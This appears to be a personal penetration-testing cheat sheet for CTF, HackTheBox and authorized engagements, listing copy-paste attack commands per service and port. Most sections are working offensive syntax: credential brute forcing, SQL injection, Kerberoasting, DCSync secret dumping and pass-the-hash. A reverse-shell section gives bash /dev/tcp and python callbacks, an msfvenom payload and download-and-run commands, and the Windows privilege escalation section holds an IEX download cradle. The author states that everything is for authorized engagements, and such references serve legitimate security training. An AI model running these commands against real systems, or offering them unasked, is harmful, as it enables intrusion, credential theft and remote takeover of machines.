hacktheplanet — CTF / HackTheBox / authorized-engagement command reference
==========================================================================
The field reference that sits under OFFENSIVE-METHODOLOGY.md. That doc is the
high-altitude phase -> MITRE ATT&CK -> tool MAP; this file is the opposite
altitude: concrete copy-paste command syntax, per service / per port.

Originally my "Home-Directory" notes file. It folds in vim/neovim: each section
is wrapped in marker banners (the modeline at the very bottom wires foldmethod
so the folds work with no extra config — open with `vim hacktheplanet`, toggle a
fold with `za`, close all with `zM`, open all with `zR`).

SCOPE FIRST. Every command below is for AUTHORIZED engagements (written ROE +
defined scope) or your own CTF / HTB lab boxes. Installing a tool is not
permission to point it at anything. Engagement DATA never lives in this repo —
it lives in ~/engagements (see `mkengagement`).

Target fill: drop your box's details once, then every <placeholder> below is
real. In vim, run the recorded macro (mark x, substitute, jump back):
    mx
    :%s,<ip_address>,10.10.10.10,g
    :%s,<hostname>,box.htb,g
    :%s,<domain>,corp.local,g
    'x
...or just :%s them by hand. These five are the recurring TARGET identifiers the
macro is worth running for:
    <ip_address>  <hostname>  <domain>  <user>  <password>
Other placeholders are per-command one-offs you fill inline, NOT via the macro —
notably <your-ip> (YOUR attacker/listener IP, never the target's), plus things
like <port>, <NThash>, <share>, <rid>/<sid>, <internal-ip>.


Scanning
++++++++++++++++++++++++++++++++++++++++
# Quick + thorough TCP, then targeted. (`nmapsweep` in offensive.zsh wraps #1.)
sudo nmap -sC -sV -oA <hostname>_1-initial <ip_address>
sudo nmap -sC -sV -sU -oA <hostname>_2-udp <ip_address>
sudo nmap -p- -T4 --min-rate 10000 -oA <hostname>_3-tcp-discovery <ip_address>
sudo nmap -A -p <ports> -oA <hostname>_4-tcp-full-scan <ip_address>   # <ports> = comma-separated list from the discovery scan

# Fast port discovery when nmap -p- is slow:
rustscan -a <ip_address> --ulimit 5000 -- -sC -sV
masscan -p1-65535 <ip_address> --rate 10000 -oL masscan.txt

# Always add the box to /etc/hosts so vhosts/Kerberos resolve:
echo "<ip_address> <hostname> <domain>" | sudo tee -a /etc/hosts
////////////////////////////////////////


Web enumeration / HTTP(S) — TCP 80/443/8080/8443
++++++++++++++++++++++++++++++++++++++++
# Fingerprint first.
whatweb http://<ip_address>
curl -sI http://<ip_address>            # headers
curl -s http://<ip_address>/robots.txt

# Directory / file brute force.
feroxbuster -u http://<ip_address> -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,txt,html
ffuf -u http://<ip_address>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic
gobuster dir -u http://<ip_address> -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,txt,html

# vhost / subdomain fuzzing (filter by response size with -fs once you see the baseline).
ffuf -u http://<ip_address> -H "Host: FUZZ.<domain>" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs <baseline-size>
gobuster vhost -u http://<domain> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain

# Scanners.
nikto -h http://<ip_address>
nuclei -u http://<ip_address>
wpscan --url http://<ip_address> --enumerate u,vp,vt   # WordPress

# SQLi: capture a request to req.txt (Burp), then:
sqlmap -r req.txt --batch --dbs
sqlmap -u "http://<ip_address>/page.php?id=1" --batch --dump
////////////////////////////////////////


FTP — TCP 21
++++++++++++++++++++++++++++++++++++++++
nmap -p21 -sCV --script=ftp-anon,ftp-bounce,ftp-syst <ip_address>
ftp <ip_address>            # try anonymous / anonymous
# mirror an open server:
wget -m --no-passive ftp://anonymous:anonymous@<ip_address>
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ftp://<ip_address>
////////////////////////////////////////


SSH — TCP 22
++++++++++++++++++++++++++++++++++++++++
nmap -p22 -sCV <ip_address>
ssh-audit <ip_address>
ssh <user>@<ip_address>
hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<ip_address>
# Found a private key? Lock down perms first or ssh refuses it:
chmod 600 id_rsa && ssh -i id_rsa <user>@<ip_address>
ssh2john id_rsa > id_rsa.hash && john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
////////////////////////////////////////


SMTP — TCP 25
++++++++++++++++++++++++++++++++++++++++
nmap -p25 --script smtp-commands,smtp-enum-users,smtp-open-relay <ip_address>
smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t <ip_address>
# manual:
nc -nv <ip_address> 25       # then: VRFY root / EXPN / RCPT TO
////////////////////////////////////////


DNS — TCP/UDP 53
++++++++++++++++++++++++++++++++++++++++
dig axfr @<ip_address> <domain>           # zone transfer
dnsenum --dnsserver <ip_address> <domain>
nslookup -> server <ip_address> -> set q=any -> <domain>
gobuster dns -d <domain> -r <ip_address> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
////////////////////////////////////////


SNMP — UDP 161
++++++++++++++++++++++++++++++++++++++++
nmap -sU -p161 --script snmp-info <ip_address>
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt <ip_address>   # find community string
snmpwalk -v2c -c public <ip_address>
snmpbulkwalk -v2c -c public <ip_address> .1   # faster full walk
snmp-check <ip_address> -c public
////////////////////////////////////////


NFS — TCP 111/2049
++++++++++++++++++++++++++++++++++++++++
nmap -p111,2049 --script=nfs-showmount,nfs-ls,nfs-statfs <ip_address>
showmount -e <ip_address>
sudo mount -t nfs <ip_address>:/<share> /mnt -o nolock
# no_root_squash? become the file owner locally (e.g. uid 1000) to read/plant.
////////////////////////////////////////


Databases — MySQL 3306 / MSSQL 1433 / PostgreSQL 5432 / Redis 6379
++++++++++++++++++++++++++++++++++++++++
mysql -h <ip_address> -u root -p
psql -h <ip_address> -U postgres
# MSSQL via NetExec / impacket:
nxc mssql <ip_address> -u <user> -p <password> --local-auth
impacket-mssqlclient <domain>/<user>:<password>@<ip_address> -windows-auth
redis-cli -h <ip_address>        # then: INFO / KEYS * / CONFIG GET dir
////////////////////////////////////////


Windows Enumeration
++++++++++++++++++++++++++++++++++++++++
# Cross-protocol sweep with NetExec (nxc = CrackMapExec's maintained successor;
# CME was archived in 2023). One scriptable interface for the whole AD attack.
nxc smb   <ip_address> -u <user> -p <password>            # add --shares --users --pass-pol
nxc ldap  <ip_address> -u <user> -p <password>
nxc winrm <ip_address> -u <user> -p <password>
////////////////////////////////////////


Microsoft Windows Kerberos — TCP 88
++++++++++++++++++++++++++++++++++++++++
nmap -p88 --open --script=krb5-enum-users -Pn -oA Kerberos <ip_address>

# Username enumeration (no creds) + AS-REP roast (no-preauth accounts):
kerbrute userenum -d <domain> --dc <ip_address> /usr/share/seclists/Usernames/Names/names.txt
impacket-GetNPUsers <domain>/ -dc-ip <ip_address> -usersfile users.txt -no-pass
nxc ldap <ip_address> -u <user> -p <password> --asreproast asrep.txt

# Kerberoast (needs valid creds) -> crack offline:
impacket-GetUserSPNs -request -dc-ip <ip_address> <domain>/<user>
nxc ldap <ip_address> -u <user> -p <password> --kerberoasting kerb.txt

# Password spray (careful with lockout policy):
kerbrute passwordspray -d <domain> --dc <ip_address> users.txt '<password>'

# DCSync / dump secrets once you have DA / replication rights:
impacket-secretsdump <domain>/Administrator:<password>@<ip_address>
impacket-secretsdump -just-dc <domain>/Administrator:<password>@<ip_address>
////////////////////////////////////////


Microsoft Windows RPC — TCP 135
++++++++++++++++++++++++++++++++++++++++
impacket-rpcdump <ip_address>
impacket-samrdump <ip_address>

nmap -sV --script msrpc-enum -Pn <ip_address>
nmap -p135 --script=msrpc-dcom-interface-activation <ip_address>

rpcclient -U "" -N <ip_address>
    srvinfo
    querydominfo
    enumdomusers
    enumdomgroups
    queryuser <rid>
    querygroup <rid>
    lookupnames <name>
    lookupsids <sid>
    createdomuser / deletedomuser
    lsaaddacctrights / lsaremoveacctrights
    dsroledominfo
    dsenumdomtrusts

impacket-lookupsid anonymous@<ip_address>   # RID cycling -> user list
////////////////////////////////////////


Netbios-ssn / Microsoft-ds — TCP 139/445 (SMB)
++++++++++++++++++++++++++++++++++++++++
nmap -n -v -Pn -p139,445 -sV <ip_address>
nmap <ip_address> --script=smb-enum-shares,smb-enum-users,smb-os-discovery
nmap <ip_address> --script=smb-vuln*

# List + browse shares (the --option dance is for old SMBv1 boxes):
smbclient -L //<ip_address>/ -N
smbclient -L //<ip_address> --option='client min protocol=NT1'
smbclient //<ip_address>/<share> -N -c 'recurse;ls'
smbclient //<ip_address>/C$ -U <user>

smbmap -H <ip_address>
smbmap -u guest -p '' -H <ip_address>
smbmap -u <user> -p <password> -d <domain> -H <ip_address> -R <share>

enum4linux-ng -A <ip_address>            # -ng is the maintained rewrite
nbtscan -r <ip_address>

# NetExec is the go-to here too — enumerate users/shares/policy in one shot:
nxc smb <ip_address> -u '' -p '' --shares           # null session
nxc smb <ip_address> -u <user> -p <password> --users --groups --shares --pass-pol
nxc smb <ip_address> -u <user> -p <password> --loggedon-users
# Spray a hash/cred across a subnet (password reuse is the bread and butter):
nxc smb <ip_address>/24 -u <user> -p <password>
nxc smb <ip_address>    -u <user> -H <NThash>       # pass-the-hash

# Mount it:
sudo mount -t cifs //<ip_address>/<share> /mnt -o username=<user>,password=<password>
////////////////////////////////////////


WinRM — TCP 5985/5986
++++++++++++++++++++++++++++++++++++++++
nxc winrm <ip_address> -u <user> -p <password>      # "(Pwn3d!)" => exec works
evil-winrm -i <ip_address> -u <user> -p <password>
evil-winrm -i <ip_address> -u <user> -H <NThash>    # pass-the-hash
////////////////////////////////////////


RDP — TCP 3389
++++++++++++++++++++++++++++++++++++++++
nxc rdp <ip_address> -u <user> -p <password>
xfreerdp /v:<ip_address> /u:<user> /p:<password> /cert:ignore /dynamic-resolution +clipboard
////////////////////////////////////////


Active Directory — attack paths
++++++++++++++++++++++++++++++++++++++++
# Map the domain. bhce (offensive.zsh) wraps the CE-ready collection:
bhce <ip_address> <user> <password> <domain>
nxc ldap <ip_address> -u <user> -p <password> --bloodhound --collection All --dns-server <ip_address>
bloodhound-python -u <user> -p <password> -d <domain> -ns <ip_address> -c All

# Roasting (see Kerberos section) -> crack -> reuse. Then escalate via paths:
#   AS-REP / Kerberoast / unconstrained-deleg / GenericAll / DCSync.
certipy-ad find -u <user>@<domain> -p <password> -dc-ip <ip_address> -vulnerable  # AD CS (ESC1-16)
# Pass-the-hash / overpass-the-hash with the creds you recover:
impacket-psexec <domain>/<user>@<ip_address> -hashes :<NThash>
nxc smb <ip_address> -u <user> -H <NThash> -x 'whoami'
////////////////////////////////////////


Credential cracking — hashcat / john
++++++++++++++++++++++++++++++++++++++++
hashid '<hash>'                      # identify the mode first
hashcat -m 1000  hashes.txt /usr/share/wordlists/rockyou.txt   # NTLM
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt    # AS-REP (krb5asrep)
hashcat -m 13100 kerb.txt  /usr/share/wordlists/rockyou.txt    # Kerberoast (TGS)
hashcat -m 5600  ntlmv2.txt /usr/share/wordlists/rockyou.txt   # NetNTLMv2 (Responder)
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Add rules when the wordlist alone misses:  -r /usr/share/hashcat/rules/best64.rule
////////////////////////////////////////


Linux privilege escalation
++++++++++++++++++++++++++++++++++++++++
# Automated:
./linpeas.sh | tee linpeas.out
# Manual quick wins:
sudo -l                              # NOPASSWD / runnable binaries -> GTFOBins
id; groups                           # interesting groups (docker, lxd, disk, adm)
find / -perm -4000 -type f 2>/dev/null     # SUID
getcap -r / 2>/dev/null                    # capabilities
cat /etc/crontab; ls -la /etc/cron.*       # writable cron jobs/scripts
uname -a; cat /etc/os-release              # kernel -> known exploit?
# GTFOBins is the lookup for any binary you can run as root / with a capability.
////////////////////////////////////////


Windows privilege escalation
++++++++++++++++++++++++++++++++++++++++
# Automated:
.\winPEASany.exe
# Manual quick wins:
whoami /priv                         # SeImpersonate/SeAssignPrimaryToken -> Potato
whoami /groups
systeminfo                           # patch level -> known exploit
# PowerUp (PowerShell) for service/registry/path misconfigs:
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<your-ip>/PowerUp.ps1'); Invoke-AllChecks"
# Unquoted service paths, AlwaysInstallElevated, stored creds (cmdkey /list).
////////////////////////////////////////


Reverse shells, stabilization, file transfer
++++++++++++++++++++++++++++++++++++++++
# Listener (offensive.zsh has `hethttp` for a quick file server):
rlwrap nc -lvnp 9001
# Common callbacks (set <your-ip>/<port>):
bash -i >& /dev/tcp/<your-ip>/9001 0>&1
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<your-ip>",9001));[os.dup2(s.fileno(),f) for f in(0,1,2)];subprocess.call(["/bin/sh"])'
# Windows payload:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=9001 -f exe -o shell.exe

# Stabilize a dumb shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'   # then Ctrl-Z; stty raw -echo; fg; export TERM=xterm

# File transfer:
python3 -m http.server 8000                       # serve from attacker
#   target: wget http://<your-ip>:8000/file  |  curl -O ...
#   windows: certutil -urlcache -f http://<your-ip>:8000/file file.exe
#   windows: powershell iwr http://<your-ip>:8000/file -OutFile file.exe
impacket-smbserver share . -smb2support           # SMB drop (great for Windows)
////////////////////////////////////////


Pivoting & tunneling
++++++++++++++++++++++++++++++++++++++++
# SSH tunnels:
ssh -L 8080:127.0.0.1:80 <user>@<ip_address>      # local forward
ssh -R 9001:127.0.0.1:9001 <user>@<ip_address>    # remote forward (callback)
ssh -D 1080 <user>@<ip_address>                   # dynamic SOCKS (+ proxychains)

# chisel (attacker = server, target = client):
chisel server -p 8000 --reverse                    # on attacker
./chisel client <your-ip>:8000 R:socks             # on target

# ligolo-ng (modern, tun-based): start proxy on attacker, agent on target,
#   then `session` -> add a route to the internal subnet via the ligolo iface.

# Route tools through the SOCKS proxy:
proxychains -q nxc smb <internal-ip>
////////////////////////////////////////


Reference
++++++++++++++++++++++++++++++++++++++++
# Wordlists (Kali default paths; $SECLISTS_DIR / $WORDLISTS_DIR in offensive.zsh):
/usr/share/wordlists/rockyou.txt
/usr/share/seclists/                 # `seclists` alias jumps here
# GTFOBins  https://gtfobins.github.io   (Linux binary -> escalation)
# LOLBAS    https://lolbas-project.github.io  (Windows living-off-the-land)
# HackTricks https://book.hacktricks.xyz  (per-service deep dives)
# PayloadsAllTheThings  (revshells, injections — many are in /usr/share already)
////////////////////////////////////////

# vim: set fdm=marker fmr=++++++++++++++++++++++++++++++++++++++++,//////////////////////////////////////// fdl=0 :
